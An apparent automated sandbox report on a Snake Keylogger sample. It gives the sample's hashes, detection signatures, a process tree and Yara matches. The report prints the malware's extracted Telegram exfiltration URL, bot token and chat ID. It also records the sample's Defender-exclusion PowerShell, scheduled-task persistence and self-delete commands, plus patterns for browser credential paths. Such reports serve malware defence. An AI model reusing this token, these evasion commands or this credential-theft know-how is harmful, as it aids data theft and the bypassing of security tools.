Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1583467
MD5:	67b58449b42453f18e51b2bf786f9588
SHA1:	9259537c4caa90a7b32c1370af18d40b2f24d0c9
SHA256:	4179ed7da1bcadc909d949d5721807d0eb0098375bc443f22fb70609927d254e
Tags:	NETexeMSILSnakeKeyloggeruser-jstrosch
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected Snake Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 3852 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 67B58449B42453F18E51B2BF786F9588)

powershell.exe (PID: 964 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\djqdPdQRO.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 6104 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 6068 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\djqdPdQRO" /XML "C:\Users\user\AppData\Local\Temp\tmp8017.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 3328 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cmd.exe (PID: 6124 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 3268 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

djqdPdQRO.exe (PID: 6628 cmdline: C:\Users\user\AppData\Roaming\djqdPdQRO.exe MD5: 67B58449B42453F18E51B2BF786F9588)

schtasks.exe (PID: 5588 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\djqdPdQRO" /XML "C:\Users\user\AppData\Local\Temp\tmp93EE.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 5988 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

RegSvcs.exe (PID: 1588 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cmd.exe (PID: 6240 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 6228 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-usering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7822875840:AAE1dEB39_r2yuQHwPOz--iI8ECcmIivnQs/sendMessage?chat_id=7342994424", "Token": "7822875840:AAE1dEB39_r2yuQHwPOz--iI8ECcmIivnQs", "Chat_id": "7342994424", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.2317370744.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2317370744.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000007.00000002.2317370744.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14968:$a1: get_encryptedPassword 0x14c54:$a2: get_encryptedUsername 0x14774:$a3: get_timePasswordChanged 0x1486f:$a4: get_passwordField 0x1497e:$a5: set_encryptedPassword 0x15fe3:$a7: get_logins 0x15f46:$a10: KeyLoggerEventArgs 0x15bb1:$a11: KeyLoggerEventArgsEventHandler
00000007.00000002.2317370744.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19974:$x1: $%SMTPDV$ 0x18358:$x2: $#TheHashHere%& 0x1991c:$x3: %FTPDV$ 0x182f8:$x4: $%TelegramDv$ 0x15bb1:$x5: KeyLoggerEventArgs 0x15f46:$x5: KeyLoggerEventArgs 0x19940:$m2: Clipboard Logs ID 0x19b7e:$m2: Screenshot Logs ID 0x19c8e:$m2: keystroke Logs ID 0x19f68:$m3: SnakePW 0x19b56:$m4: \SnakeKeylogger\
00000009.00000002.2281225778.000000000380F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2281225778.000000000380F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.2281225778.000000000380F000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x15340:$a1: get_encryptedPassword 0x35f60:$a1: get_encryptedPassword 0x56980:$a1: get_encryptedPassword 0x1562c:$a2: get_encryptedUsername 0x3624c:$a2: get_encryptedUsername 0x56c6c:$a2: get_encryptedUsername 0x1514c:$a3: get_timePasswordChanged 0x35d6c:$a3: get_timePasswordChanged 0x5678c:$a3: get_timePasswordChanged 0x15247:$a4: get_passwordField 0x35e67:$a4: get_passwordField 0x56887:$a4: get_passwordField 0x15356:$a5: set_encryptedPassword 0x35f76:$a5: set_encryptedPassword 0x56996:$a5: set_encryptedPassword 0x169bb:$a7: get_logins 0x375db:$a7: get_logins 0x57ffb:$a7: get_logins 0x1691e:$a10: KeyLoggerEventArgs 0x3753e:$a10: KeyLoggerEventArgs 0x57f5e:$a10: KeyLoggerEventArgs
00000009.00000002.2281225778.000000000380F000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1a34c:$x1: $%SMTPDV$ 0x3af6c:$x1: $%SMTPDV$ 0x5b98c:$x1: $%SMTPDV$ 0x18d30:$x2: $#TheHashHere%& 0x39950:$x2: $#TheHashHere%& 0x5a370:$x2: $#TheHashHere%& 0x1a2f4:$x3: %FTPDV$ 0x3af14:$x3: %FTPDV$ 0x5b934:$x3: %FTPDV$ 0x18cd0:$x4: $%TelegramDv$ 0x398f0:$x4: $%TelegramDv$ 0x5a310:$x4: $%TelegramDv$ 0x16589:$x5: KeyLoggerEventArgs 0x1691e:$x5: KeyLoggerEventArgs 0x371a9:$x5: KeyLoggerEventArgs 0x3753e:$x5: KeyLoggerEventArgs 0x57bc9:$x5: KeyLoggerEventArgs 0x57f5e:$x5: KeyLoggerEventArgs 0x1a318:$m2: Clipboard Logs ID 0x1a556:$m2: Screenshot Logs ID 0x1a666:$m2: keystroke Logs ID
00000007.00000002.2319885033.00000000026E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000D.00000002.2485586490.0000000002C71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2231352999.000000000450E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2231352999.000000000450E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2231352999.000000000450E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x15338:$a1: get_encryptedPassword 0x35f58:$a1: get_encryptedPassword 0x56978:$a1: get_encryptedPassword 0x15624:$a2: get_encryptedUsername 0x36244:$a2: get_encryptedUsername 0x56c64:$a2: get_encryptedUsername 0x15144:$a3: get_timePasswordChanged 0x35d64:$a3: get_timePasswordChanged 0x56784:$a3: get_timePasswordChanged 0x1523f:$a4: get_passwordField 0x35e5f:$a4: get_passwordField 0x5687f:$a4: get_passwordField 0x1534e:$a5: set_encryptedPassword 0x35f6e:$a5: set_encryptedPassword 0x5698e:$a5: set_encryptedPassword 0x169b3:$a7: get_logins 0x375d3:$a7: get_logins 0x57ff3:$a7: get_logins 0x16916:$a10: KeyLoggerEventArgs 0x37536:$a10: KeyLoggerEventArgs 0x57f56:$a10: KeyLoggerEventArgs
00000000.00000002.2231352999.000000000450E000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1a344:$x1: $%SMTPDV$ 0x3af64:$x1: $%SMTPDV$ 0x5b984:$x1: $%SMTPDV$ 0x18d28:$x2: $#TheHashHere%& 0x39948:$x2: $#TheHashHere%& 0x5a368:$x2: $#TheHashHere%& 0x1a2ec:$x3: %FTPDV$ 0x3af0c:$x3: %FTPDV$ 0x5b92c:$x3: %FTPDV$ 0x18cc8:$x4: $%TelegramDv$ 0x398e8:$x4: $%TelegramDv$ 0x5a308:$x4: $%TelegramDv$ 0x16581:$x5: KeyLoggerEventArgs 0x16916:$x5: KeyLoggerEventArgs 0x371a1:$x5: KeyLoggerEventArgs 0x37536:$x5: KeyLoggerEventArgs 0x57bc1:$x5: KeyLoggerEventArgs 0x57f56:$x5: KeyLoggerEventArgs 0x1a310:$m2: Clipboard Logs ID 0x1a54e:$m2: Screenshot Logs ID 0x1a65e:$m2: keystroke Logs ID
Process Memory Space: file.exe PID: 3852	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 3852	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: file.exe PID: 3852	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3b811:$a1: get_encryptedPassword 0x3baf3:$a2: get_encryptedUsername 0x3b627:$a3: get_timePasswordChanged 0x3b722:$a4: get_passwordField 0x3b827:$a5: set_encryptedPassword 0x3dcfd:$a7: get_logins 0x3dc60:$a10: KeyLoggerEventArgs 0x3d8cb:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: file.exe PID: 3852	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x3d8cb:$x5: KeyLoggerEventArgs 0x3dc60:$x5: KeyLoggerEventArgs 0x3e567:$x5: KeyLoggerEventArgs 0x3e8c8:$x5: KeyLoggerEventArgs 0x3fe8b:$m2: Clipboard Logs ID 0x3ff91:$m2: Screenshot Logs ID 0x3ffe7:$m2: keystroke Logs ID 0x4011c:$m3: SnakePW 0x3ff7d:$m4: \SnakeKeylogger\
Process Memory Space: RegSvcs.exe PID: 3328	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 3328	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 3328	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x22a05:$a1: get_encryptedPassword 0x22ce7:$a2: get_encryptedUsername 0x2281b:$a3: get_timePasswordChanged 0x22916:$a4: get_passwordField 0x22a1b:$a5: set_encryptedPassword 0x24ef1:$a7: get_logins 0x24e54:$a10: KeyLoggerEventArgs 0x24abf:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 3328	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x24abf:$x5: KeyLoggerEventArgs 0x24e54:$x5: KeyLoggerEventArgs 0x2575b:$x5: KeyLoggerEventArgs 0x25abc:$x5: KeyLoggerEventArgs 0x2707f:$m2: Clipboard Logs ID 0x27185:$m2: Screenshot Logs ID 0x271db:$m2: keystroke Logs ID 0x27310:$m3: SnakePW 0x27171:$m4: \SnakeKeylogger\
Process Memory Space: djqdPdQRO.exe PID: 6628	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: djqdPdQRO.exe PID: 6628	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: djqdPdQRO.exe PID: 6628	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: djqdPdQRO.exe PID: 6628	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3cb0e:$a1: get_encryptedPassword 0x3cdf0:$a2: get_encryptedUsername 0x3c924:$a3: get_timePasswordChanged 0x3ca1f:$a4: get_passwordField 0x3cb24:$a5: set_encryptedPassword 0x3effa:$a7: get_logins 0x3ef5d:$a10: KeyLoggerEventArgs 0x3ebc8:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: djqdPdQRO.exe PID: 6628	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x3ebc8:$x5: KeyLoggerEventArgs 0x3ef5d:$x5: KeyLoggerEventArgs 0x3f864:$x5: KeyLoggerEventArgs 0x3fbc5:$x5: KeyLoggerEventArgs 0x41188:$m2: Clipboard Logs ID 0x4128e:$m2: Screenshot Logs ID 0x412e4:$m2: keystroke Logs ID 0x41419:$m3: SnakePW 0x4127a:$m4: \SnakeKeylogger\
Process Memory Space: RegSvcs.exe PID: 1588	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Click to see the 23 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
7.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14b68:$a1: get_encryptedPassword 0x14e54:$a2: get_encryptedUsername 0x14974:$a3: get_timePasswordChanged 0x14a6f:$a4: get_passwordField 0x14b7e:$a5: set_encryptedPassword 0x161e3:$a7: get_logins 0x16146:$a10: KeyLoggerEventArgs 0x15db1:$a11: KeyLoggerEventArgsEventHandler
7.2.RegSvcs.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c53c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b76e:$a3: \Google\Chrome\User Data\Default\Login Data 0x1bba1:$a4: \Orbitum\User Data\Default\Login Data 0x1cbe0:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15757:$s1: UnHook 0x1575e:$s2: SetHook 0x15766:$s3: CallNextHook 0x15773:$s4: _hook
7.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19b74:$x1: $%SMTPDV$ 0x18558:$x2: $#TheHashHere%& 0x19b1c:$x3: %FTPDV$ 0x184f8:$x4: $%TelegramDv$ 0x15db1:$x5: KeyLoggerEventArgs 0x16146:$x5: KeyLoggerEventArgs 0x19b40:$m2: Clipboard Logs ID 0x19d7e:$m2: Screenshot Logs ID 0x19e8e:$m2: keystroke Logs ID 0x1a168:$m3: SnakePW 0x19d56:$m4: \SnakeKeylogger\
9.2.djqdPdQRO.exe.38303f8.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.djqdPdQRO.exe.38303f8.3.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
9.2.djqdPdQRO.exe.38303f8.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12d68:$a1: get_encryptedPassword 0x13054:$a2: get_encryptedUsername 0x12b74:$a3: get_timePasswordChanged 0x12c6f:$a4: get_passwordField 0x12d7e:$a5: set_encryptedPassword 0x143e3:$a7: get_logins 0x14346:$a10: KeyLoggerEventArgs 0x13fb1:$a11: KeyLoggerEventArgsEventHandler
9.2.djqdPdQRO.exe.38303f8.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a73c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1996e:$a3: \Google\Chrome\User Data\Default\Login Data 0x19da1:$a4: \Orbitum\User Data\Default\Login Data 0x1ade0:$a5: \Kometa\User Data\Default\Login Data
9.2.djqdPdQRO.exe.38303f8.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13957:$s1: UnHook 0x1395e:$s2: SetHook 0x13966:$s3: CallNextHook 0x13973:$s4: _hook
9.2.djqdPdQRO.exe.38303f8.3.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17d74:$x1: $%SMTPDV$ 0x16758:$x2: $#TheHashHere%& 0x17d1c:$x3: %FTPDV$ 0x166f8:$x4: $%TelegramDv$ 0x13fb1:$x5: KeyLoggerEventArgs 0x14346:$x5: KeyLoggerEventArgs 0x17d40:$m2: Clipboard Logs ID 0x17f7e:$m2: Screenshot Logs ID 0x1808e:$m2: keystroke Logs ID 0x18368:$m3: SnakePW 0x17f56:$m4: \SnakeKeylogger\
0.2.file.exe.452f3f0.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.file.exe.452f3f0.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.file.exe.452f3f0.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12d68:$a1: get_encryptedPassword 0x13054:$a2: get_encryptedUsername 0x12b74:$a3: get_timePasswordChanged 0x12c6f:$a4: get_passwordField 0x12d7e:$a5: set_encryptedPassword 0x143e3:$a7: get_logins 0x14346:$a10: KeyLoggerEventArgs 0x13fb1:$a11: KeyLoggerEventArgsEventHandler
0.2.file.exe.452f3f0.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a73c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1996e:$a3: \Google\Chrome\User Data\Default\Login Data 0x19da1:$a4: \Orbitum\User Data\Default\Login Data 0x1ade0:$a5: \Kometa\User Data\Default\Login Data
0.2.file.exe.452f3f0.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13957:$s1: UnHook 0x1395e:$s2: SetHook 0x13966:$s3: CallNextHook 0x13973:$s4: _hook
0.2.file.exe.452f3f0.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17d74:$x1: $%SMTPDV$ 0x16758:$x2: $#TheHashHere%& 0x17d1c:$x3: %FTPDV$ 0x166f8:$x4: $%TelegramDv$ 0x13fb1:$x5: KeyLoggerEventArgs 0x14346:$x5: KeyLoggerEventArgs 0x17d40:$m2: Clipboard Logs ID 0x17f7e:$m2: Screenshot Logs ID 0x1808e:$m2: keystroke Logs ID 0x18368:$m3: SnakePW 0x17f56:$m4: \SnakeKeylogger\
9.2.djqdPdQRO.exe.380f7d8.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.djqdPdQRO.exe.380f7d8.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
9.2.djqdPdQRO.exe.380f7d8.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12d68:$a1: get_encryptedPassword 0x13054:$a2: get_encryptedUsername 0x12b74:$a3: get_timePasswordChanged 0x12c6f:$a4: get_passwordField 0x12d7e:$a5: set_encryptedPassword 0x143e3:$a7: get_logins 0x14346:$a10: KeyLoggerEventArgs 0x13fb1:$a11: KeyLoggerEventArgsEventHandler
9.2.djqdPdQRO.exe.380f7d8.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a73c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1996e:$a3: \Google\Chrome\User Data\Default\Login Data 0x19da1:$a4: \Orbitum\User Data\Default\Login Data 0x1ade0:$a5: \Kometa\User Data\Default\Login Data
9.2.djqdPdQRO.exe.380f7d8.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13957:$s1: UnHook 0x1395e:$s2: SetHook 0x13966:$s3: CallNextHook 0x13973:$s4: _hook
9.2.djqdPdQRO.exe.380f7d8.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17d74:$x1: $%SMTPDV$ 0x16758:$x2: $#TheHashHere%& 0x17d1c:$x3: %FTPDV$ 0x166f8:$x4: $%TelegramDv$ 0x13fb1:$x5: KeyLoggerEventArgs 0x14346:$x5: KeyLoggerEventArgs 0x17d40:$m2: Clipboard Logs ID 0x17f7e:$m2: Screenshot Logs ID 0x1808e:$m2: keystroke Logs ID 0x18368:$m3: SnakePW 0x17f56:$m4: \SnakeKeylogger\
0.2.file.exe.450e7d0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.file.exe.450e7d0.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.file.exe.450e7d0.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12d68:$a1: get_encryptedPassword 0x13054:$a2: get_encryptedUsername 0x12b74:$a3: get_timePasswordChanged 0x12c6f:$a4: get_passwordField 0x12d7e:$a5: set_encryptedPassword 0x143e3:$a7: get_logins 0x14346:$a10: KeyLoggerEventArgs 0x13fb1:$a11: KeyLoggerEventArgsEventHandler
0.2.file.exe.450e7d0.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a73c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1996e:$a3: \Google\Chrome\User Data\Default\Login Data 0x19da1:$a4: \Orbitum\User Data\Default\Login Data 0x1ade0:$a5: \Kometa\User Data\Default\Login Data
0.2.file.exe.450e7d0.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13957:$s1: UnHook 0x1395e:$s2: SetHook 0x13966:$s3: CallNextHook 0x13973:$s4: _hook
0.2.file.exe.450e7d0.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17d74:$x1: $%SMTPDV$ 0x16758:$x2: $#TheHashHere%& 0x17d1c:$x3: %FTPDV$ 0x166f8:$x4: $%TelegramDv$ 0x13fb1:$x5: KeyLoggerEventArgs 0x14346:$x5: KeyLoggerEventArgs 0x17d40:$m2: Clipboard Logs ID 0x17f7e:$m2: Screenshot Logs ID 0x1808e:$m2: keystroke Logs ID 0x18368:$m3: SnakePW 0x17f56:$m4: \SnakeKeylogger\
9.2.djqdPdQRO.exe.38303f8.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.djqdPdQRO.exe.38303f8.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.djqdPdQRO.exe.38303f8.3.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
9.2.djqdPdQRO.exe.38303f8.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14b68:$a1: get_encryptedPassword 0x35588:$a1: get_encryptedPassword 0x14e54:$a2: get_encryptedUsername 0x35874:$a2: get_encryptedUsername 0x14974:$a3: get_timePasswordChanged 0x35394:$a3: get_timePasswordChanged 0x14a6f:$a4: get_passwordField 0x3548f:$a4: get_passwordField 0x14b7e:$a5: set_encryptedPassword 0x3559e:$a5: set_encryptedPassword 0x161e3:$a7: get_logins 0x36c03:$a7: get_logins 0x16146:$a10: KeyLoggerEventArgs 0x36b66:$a10: KeyLoggerEventArgs 0x15db1:$a11: KeyLoggerEventArgsEventHandler 0x367d1:$a11: KeyLoggerEventArgsEventHandler
9.2.djqdPdQRO.exe.38303f8.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c53c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cf5c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b76e:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c18e:$a3: \Google\Chrome\User Data\Default\Login Data 0x1bba1:$a4: \Orbitum\User Data\Default\Login Data 0x3c5c1:$a4: \Orbitum\User Data\Default\Login Data 0x1cbe0:$a5: \Kometa\User Data\Default\Login Data 0x3d600:$a5: \Kometa\User Data\Default\Login Data
9.2.djqdPdQRO.exe.38303f8.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15757:$s1: UnHook 0x36177:$s1: UnHook 0x1575e:$s2: SetHook 0x3617e:$s2: SetHook 0x15766:$s3: CallNextHook 0x36186:$s3: CallNextHook 0x15773:$s4: _hook 0x36193:$s4: _hook
9.2.djqdPdQRO.exe.38303f8.3.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19b74:$x1: $%SMTPDV$ 0x3a594:$x1: $%SMTPDV$ 0x18558:$x2: $#TheHashHere%& 0x38f78:$x2: $#TheHashHere%& 0x19b1c:$x3: %FTPDV$ 0x3a53c:$x3: %FTPDV$ 0x184f8:$x4: $%TelegramDv$ 0x38f18:$x4: $%TelegramDv$ 0x15db1:$x5: KeyLoggerEventArgs 0x16146:$x5: KeyLoggerEventArgs 0x367d1:$x5: KeyLoggerEventArgs 0x36b66:$x5: KeyLoggerEventArgs 0x19b40:$m2: Clipboard Logs ID 0x19d7e:$m2: Screenshot Logs ID 0x19e8e:$m2: keystroke Logs ID 0x3a560:$m2: Clipboard Logs ID 0x3a79e:$m2: Screenshot Logs ID 0x3a8ae:$m2: keystroke Logs ID 0x1a168:$m3: SnakePW 0x3ab88:$m3: SnakePW 0x19d56:$m4: \SnakeKeylogger\
9.2.djqdPdQRO.exe.380f7d8.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
